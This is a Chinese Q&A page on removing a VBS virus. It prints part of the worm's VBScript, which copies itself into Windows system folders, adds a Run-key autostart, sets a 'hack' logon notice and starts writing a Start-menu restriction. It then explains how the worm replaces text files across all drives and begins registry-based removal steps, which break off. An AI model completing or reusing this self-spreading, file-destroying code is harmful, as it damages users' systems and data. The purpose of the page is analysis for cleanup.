清除VBS病毒

来源：百度知道编辑：UC知道时间：2024/06/20 20:57:41

'Ycosxhack [Y.X.H]
on error resume next
set fso=createobject("scripting.filesystemobject")
randomize
name=int(rnd*10000000+1)
temp=name
for i=0 to 2
set dir=fso.getspecialfolder(i)
fso.getfile(wscript.scriptfullname).copy(dir&"\"&name&".vbs")
next
'--------------------------------------------------------
set reg=createobject("wscript.shell")
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon","c:\windows\system32\"&temp&".vbs"
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","hack"
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","sorry!!!"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Wind

这个vbs首先获取windows的三个特殊文件夹，默认情况下分别是
c:\windows
c:\windows\system32
c:\documents and settings\%username%\local settings\temp
然后把自己拷贝到这三个文件夹下，文件名是随机六位数（每次开机都会变化）

然后在注册表里添加如下键值
HKEY_LOCAL_MACHINE\OFTWARE\Microsoft\Windows\CurrentVersion\Run
"ctfmon"="c:\windows\system32\随机7位数文件名.vbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
"LegalNoticeCaption"="hack"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
"LegalNoticeText"="sorry!!!" (黑了人还道歉)..

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
"NoRun"=1 (禁止开始菜单)

然后扫描所有硬盘，把所有txt替换成自己的内容，不过不是替换之后重命名，而是先更改内容，复制，然后删除原txt

解决方法：
1.找到vbs的名称
开始菜单-运行-regedit，顺次打开
HKEY_LOCA

病毒Bloodhound.VBS.4是什么?怎么清除? Script.VBS.Qhost.c是什么病毒？？？如何清除病毒Trojan.DL.VBS.Agent.cel如何清除？请教如何清除Trojan.DL.VBS.A...病毒 trojan.dl.vbs.small.eh是什么病毒阿?怎样清除？ Trojan.DL.VBS.Agent.j是什么病毒，怎么清除，清除后系统需要重新做吗 trojan.vbs 清除电脑中病毒 vbs redlof.a_1,如何清除这种病毒,请大家指教 VBS.StartPage.d JS.CodeExec.a Exploit.Html.Mht.ck 这三个病毒怎么清除? 请问Trojan.DL.VBS.Agent.j是什么病毒,怎样才能清除啊?谢谢~